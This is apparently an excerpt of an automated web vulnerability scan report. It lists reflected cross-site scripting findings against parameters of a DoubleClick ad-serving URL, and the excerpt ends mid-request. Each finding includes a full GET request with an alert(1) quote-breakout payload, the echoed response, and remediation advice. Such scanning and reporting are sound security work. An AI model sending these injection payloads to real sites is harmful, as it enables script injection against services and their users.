Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=835f0"-alert(1)-"b57ef62ecd6&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW
...[SNIP]...
2.16. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [event parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c202"-alert(1)-"cae4b935fff was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=4c202"-alert(1)-"cae4b935fff HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7198
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 13:33:54 GMT
Expires: Thu, 12 May 2011 13:33:54 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
d=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=4c202"-alert(1)-"cae4b935fffhttp://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7CHardware%7C300x250-_-BRAND_MEDLAR_NETWORKING_NA_300X250_A");
var fscUrl = url;
...[SNIP]...
2.17. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb0b4"-alert(1)-"b2cfa13b6 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cncb0b4"-alert(1)-"b2cfa13b6&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:29:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7202

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
49/%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cncb0b4"-alert(1)-"b2cfa13b6&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t
...[SNIP]...
2.18. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7930"-alert(1)-"94b55cfc87e was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=e7930"-alert(1)-"94b55cfc87e&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:30:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=e7930"-alert(1)-"94b55cfc87e&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.1
...[SNIP]...
2.19. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [nd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb80b"-alert(1)-"2b1e9684f83 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616bb80b"-alert(1)-"2b1e9684f83&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
2874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616bb80b"-alert(1)-"2b1e9684f83&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http
...[SNIP]...
2.20. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f33e6"-alert(1)-"c79dbcd5ee was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253Af33e6"-alert(1)-"c79dbcd5ee&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:29:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7206

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
/17/14a/%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253Af33e6"-alert(1)-"c79dbcd5ee&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAA
...[SNIP]...
2.21. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [oepartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13b18"-alert(1)-"5dc3b23c1c5 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=13b18"-alert(1)-"5dc3b23c1c5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
17%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=13b18"-alert(1)-"5dc3b23c1c5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q2
...[SNIP]...
2.22. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [orh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac689"-alert(1)-"dc8c391f7a was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=ac689"-alert(1)-"dc8c391f7a&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7206

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
c%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=ac689"-alert(1)-"dc8c391f7a&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=O
...[SNIP]...
2.23. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4838"-alert(1)-"8c657af55e4 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=f4838"-alert(1)-"8c657af55e4&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:30:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
%2a/q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=f4838"-alert(1)-"8c657af55e4&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=20
...[SNIP]...
2.24. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [pdom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2449a"-alert(1)-"02e7851709b was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=2449a"-alert(1)-"02e7851709b&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
